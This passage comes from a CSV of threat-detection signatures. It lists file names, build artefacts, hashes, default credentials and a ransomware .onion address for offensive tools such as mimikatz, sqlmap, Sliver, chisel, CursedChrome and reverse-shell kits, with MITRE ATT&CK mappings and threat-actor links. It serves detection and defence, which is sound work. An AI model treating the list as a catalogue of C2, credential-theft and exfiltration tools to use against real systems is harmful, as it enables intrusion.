security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40167" "*data/payloads/stager.ps1*",".{0,1000}data\/payloads\/stager\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","40168" "*data/shell/backdoors*",".{0,1000}data\/shell\/backdoors.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","40169" "*data/shell/stagers*",".{0,1000}data\/shell\/stagers.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","40170" "*data/wordlist_256.txt*",".{0,1000}data\/wordlist_256\.txt.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","40171" "*data/wordlists*",".{0,1000}data\/wordlists.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40172" "*Data\VulnerableCOM.csv*",".{0,1000}Data\\VulnerableCOM\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","40173" "*database/c2.db*",".{0,1000}database\/c2\.db.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","40174" "*DATABASE_PASSWORD: cursedchrome*",".{0,1000}DATABASE_PASSWORD\:\scursedchrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into 
fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","40175" "*DATABASE_USER: cursedchrome*",".{0,1000}DATABASE_USER\:\scursedchrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","40176" "*DataBouncing-main.zip*",".{0,1000}DataBouncing\-main\.zip.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","40177" "*DataSploit*",".{0,1000}DataSploit.{0,1000}","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","N/A","3","279","674","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z","40180" "*datr=80ZzUfKqDOjwL8pauwqMjHTa*",".{0,1000}datr\=80ZzUfKqDOjwL8pauwqMjHTa.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","40181" "*DavidXanatos/DiskCryptor*",".{0,1000}DavidXanatos\/DiskCryptor.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40182" "*DavRelayUp.csproj*",".{0,1000}DavRelayUp\.csproj.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40183" "*DavRelayUp.exe*",".{0,1000}DavRelayUp\.exe.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40184" "*DavRelayUp.sln*",".{0,1000}DavRelayUp\.sln.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40185" 
"*DavRelayUp-master*",".{0,1000}DavRelayUp\-master.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40186" "*davtdavm734bl4hkr3sr4dvfzpdzuzei2zrcor4vte4a3xuok2rxcmyd.onion*",".{0,1000}davtdavm734bl4hkr3sr4dvfzpdzuzei2zrcor4vte4a3xuok2rxcmyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40187" "*Daybr4ak/C2ReverseProxy*",".{0,1000}Daybr4ak\/C2ReverseProxy.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","40188" "*dazzleUP.cna*",".{0,1000}dazzleUP\.cna.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40189" "*dazzleUP.exe*",".{0,1000}dazzleUP\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - 
T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40190" "*dazzleUP.sln*",".{0,1000}dazzleUP\.sln.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40191" "*dazzleUP.vcxproj*",".{0,1000}dazzleUP\.vcxproj.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40192" "*dazzleUP.x32.exe*",".{0,1000}dazzleUP\.x32\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40193" "*dazzleUP.x64.exe*",".{0,1000}dazzleUP\.x64\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege 
Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40194" "*dazzleUP_Reflective_DLL*",".{0,1000}dazzleUP_Reflective_DLL.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40195" "*dazzleUP-master*",".{0,1000}dazzleUP\-master.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40196" "*db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e*",".{0,1000}db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","40198" "*db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363*",".{0,1000}db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40199" "*db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93*",".{0,1000}db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40200" "*db1288eace30cc5f6f942df1596f94ba846ed8fee9772ad68fc45a5efac6d6db*",".{0,1000}db1288eace30cc5f6f942df1596f94ba846ed8fee9772ad68fc45a5efac6d6db.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","40201" "*db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676*",".{0,1000}db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest 
- GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40202" "*db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f*",".{0,1000}db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40203" "*db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b*",".{0,1000}db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40204" "*db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895*",".{0,1000}db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40206" "*db2_default_pass.txt*",".{0,1000}db2_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40207" "*db2_default_user.txt*",".{0,1000}db2_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40208" "*DB234158-233E-4EC4-A2CE-EF02699563A2*",".{0,1000}DB234158\-233E\-4EC4\-A2CE\-EF02699563A2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40210" "*db2959484aa1ca726c7147977736455908ae0c912bd96278a3c40723fe8b6e38*",".{0,1000}db2959484aa1ca726c7147977736455908ae0c912bd96278a3c40723fe8b6e38.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40211" "*db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354*",".{0,1000}db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40213" "*db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210*",".{0,1000}db2c660c7cdfb86957e95790e3bef0a7ebf7fc1b1d7e48b14cbf70210ca87210.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40214" "*db316e36b24cc4e62eacabee4b9f4704fea5880a9e31508796b3b48c0a9911ca*",".{0,1000}db316e36b24cc4e62eacabee4b9f4704fea5880a9e31508796b3b48c0a9911ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40216" 
"*db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5*",".{0,1000}db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40217" "*db32c7cf222148bc4d2d52055355a3b82cb10eb8d8b0cd058a9c9d5e34f00adf*",".{0,1000}db32c7cf222148bc4d2d52055355a3b82cb10eb8d8b0cd058a9c9d5e34f00adf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40218" "*db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca*",".{0,1000}db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - 
MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40220" "*db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca*",".{0,1000}db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40221" "*db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9*",".{0,1000}db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
